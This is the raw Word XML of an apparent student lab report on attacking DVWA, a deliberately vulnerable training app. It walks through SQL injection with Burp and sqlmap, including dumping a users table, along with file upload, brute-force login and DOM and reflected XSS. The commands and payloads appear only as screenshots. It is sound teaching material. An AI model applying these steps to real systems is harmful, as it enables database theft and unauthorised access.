        <w:spacing w:after="175"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DVWA Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E35D007" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="175"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A82F9" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Intercept the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FF499E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t>In Burp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B83753" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="175"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy → Intercept</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F279E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="175"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t xml:space="preserve">Make sure </w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intercept is ON</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450FC8A4" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t>In DVWA, enter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09911951" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E84F4D2" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB0DF33" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t>Burp should stop the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356F893C" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Save it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F0973E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t>Right-click inside the intercepted request and choose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6F433" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t>Save item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613317BA" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t>Save it as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00221430" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t>/home/kali/</w:t>
      </w:r>
      <w:r>
        <w:t>fred</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D3235" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Let the request continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162BDAA6" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t>Click:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6FC76E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t>Forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A42987B" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:t xml:space="preserve">or turn </w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intercept OFF</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:t xml:space="preserve"> so the page loads normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0987F" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00C20838" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. Test </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C20838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E473D0B" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DFDA0F7" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005B1D5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14E8A485" wp14:editId="3BFC442E">
            <wp:extent cx="4693468" cy="3146854"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="173252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211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2191" cy="315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18FF" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>6. List tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726CAC73" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005B1D5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57D06596" wp14:editId="70D61344">
            <wp:extent cx="4645029" cy="3262184"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="20285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0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1885" cy="32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B25C" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:t>List Columns in the users Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5767538E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005B1D5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FAE077F" wp14:editId="32626D47">
            <wp:extent cx="4284095" cy="3146854"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1645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04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5028" cy="31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4A26" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C20838">
        <w:t>Dump the Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D126C4B" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005B1D5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="050703FB" wp14:editId="793056B9">
            <wp:extent cx="4226962" cy="3278660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7991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22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0013" cy="32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66F1" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005B1D5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E7BED4B" wp14:editId="034B3A48">
            <wp:extent cx="4874971" cy="3204519"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="47736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2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4722" cy="32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0264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6CD3A42C" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00E52B80" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E52B80">
        <w:lastRenderedPageBreak/>
        <w:t>FILE UPLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4E10C4" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009137FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78077C13" wp14:editId="522FCD47">
            <wp:extent cx="4407877" cy="3185254"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="877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3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2490" cy="31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EE84" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06FC2A74" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009137FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EE30E9D" wp14:editId="37B44D24">
            <wp:extent cx="4133462" cy="2920568"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="15505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33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2789" cy="29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5838" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69461909" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00E52B80" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E52B80">
        <w:lastRenderedPageBreak/>
        <w:t>Brute Force Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B4D0E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The Brute Force module presents a standard username/password login form. At the Low security level, DVWA imposes no account lockout, CAPTCHA, or rate-limiting, making the login mechanism susceptible to automated credential-guessing attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B07E350" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B002915" wp14:editId="7034DDA6">
            <wp:extent cx="3116425" cy="3467022"/>
            <wp:effectExtent l="0" t="0" r="8255" b="635"/>
            <wp:docPr id="80290238" name="Picture 8029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79" cy="34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7280D09" wp14:editId="1688E31F">
            <wp:extent cx="2627877" cy="3470988"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1207663011" name="Picture 1207663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731" cy="34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23A5" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left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Comparing application responses for a correct login (top) and an incorrect login (bottom); the differing response text enables automated brute-force detection of success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056C3189" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="00E52B80" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E52B80">
        <w:t>Vulnerability 3: Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B4F7EA" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-Site Scripting occurs when untrusted user input is rendered by a web application without adequate output encoding, allowing an attacker to inject and execute arbitrary client-side script in a victim's browser. Two variants were demonstrated: DOM-based XSS and Reflected XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139786C1" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>DOM-Based XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37195D2D" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The DOM-Based XSS module allows a user to select a display language from a drop-down list. The selected value is written directly into the page's URL and DOM by client-side JavaScript, without server round-trip validation, allowing script injection through the default parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631850A0" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C7DCF5E" wp14:editId="2188F7FB">
            <wp:extent cx="4385388" cy="3041650"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1543060246" name="Picture 154306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527" cy="305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FCB1" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>2 Reflected XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BFE1B9" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The Reflected XSS module accepts a name value through a form field and echoes it back into the page ('Hello &lt;name&gt;') without sanitising HTML special characters. Because the input is reflected directly into the page markup, HTML and JavaScript supplied by the user are rendered as part of the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534364BA" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="006D0C88" w:rsidRDefault="007E621D" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E9E1FD1" wp14:editId="33376147">
            <wp:extent cx="4516017" cy="2673932"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="654741948" name="Picture 654741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60" cy="26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D31B" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D"/>
    <w:sectPr w:rsidR="007E621D" w:rsidSect="007E621D">
      <w:headerReference w:type="even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2194" w:right="1439" w:bottom="2027" w:left="1436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016D" w14:textId="77777777" w:rsidR="00FA2C0F" w:rsidRDefault="00FA2C0F" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="54E3C835" w14:textId="77777777" w:rsidR="00FA2C0F" w:rsidRDefault="00FA2C0F" w:rsidP="007E6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A4D4" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4656"/>
        <w:tab w:val="center" w:pos="9234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FB0485" wp14:editId="76E9484A">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>896417</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>8933383</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5981065" cy="412966"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="6177" name="Group 6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412966"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="5981065" cy="412966"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="6360" name="Shape 636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179" name="Picture 61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466" y="135597"/>
                          <a:ext cx="438912" cy="2773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80" name="Picture 61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41264" y="135597"/>
                          <a:ext cx="438912" cy="2773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969222" id="Group 6177" o:spid="_x0000_s1026" style="position:absolute;margin-left:70.6pt;margin-top:703.4pt;width:470.95pt;height:32.5pt;z-index:-251657216;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="59810,4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">
              <v:shape id="Shape 6360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" path="m,l5981065,r,9144l,9144,,e" fillcolor="#4472c4" stroked="f" strokeweight="0">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,5981065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79" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:994;top:1355;width:4389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">
                <v:imagedata r:id="rId2" o:title=""/>
              </v:shape>
              <v:shape id="Picture 6180" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:54412;top:1355;width:4389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  <w:color w:val="4472C4"/>
        <w:sz w:val="44"/>
      </w:rPr>
      <w:t>BNCS1210 Data Structures &amp; Algorithm</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="4472C4"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="4472C4"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="4472C4"/>
        <w:sz w:val="37"/>
        <w:vertAlign w:val="subscript"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="061F46F0" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="5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5291" w14:textId="77777777" w:rsidR="007E621D" w:rsidRPr="007E621D" w:rsidRDefault="007E621D" w:rsidP="007E621D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r w:rsidRPr="007E621D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3883" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4656"/>
        <w:tab w:val="center" w:pos="9234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B05B9E" wp14:editId="6AB7A06D">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>896417</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>8933383</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5981065" cy="412966"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="6107" name="Group 6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412966"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="5981065" cy="412966"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="6356" name="Shape 635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109" name="Picture 61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466" y="135597"/>
                          <a:ext cx="438912" cy="2773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10" name="Picture 6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41264" y="135597"/>
                          <a:ext cx="438912" cy="2773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A4375D" id="Group 6107" o:spid="_x0000_s1026" style="position:absolute;margin-left:70.6pt;margin-top:703.4pt;width:470.95pt;height:32.5pt;z-index:-251657216;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="59810,4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">
              <v:shape id="Shape 635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" path="m,l5981065,r,9144l,9144,,e" fillcolor="#4472c4" stroked="f" strokeweight="0">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,5981065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09" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:994;top:1355;width:4389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">
                <v:imagedata r:id="rId2" o:title=""/>
              </v:shape>
              <v:shape id="Picture 6110" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:54412;top:1355;width:4389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  <w:color w:val="4472C4"/>
        <w:sz w:val="44"/>
      </w:rPr>
      <w:t>BNCS1210 Data Structures &amp; Algorithm</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="4472C4"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="4472C4"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="4472C4"/>
        <w:sz w:val="37"/>
        <w:vertAlign w:val="subscript"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="62A8A353" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="5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38C4" w14:textId="77777777" w:rsidR="00FA2C0F" w:rsidRDefault="00FA2C0F" w:rsidP="007E621D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
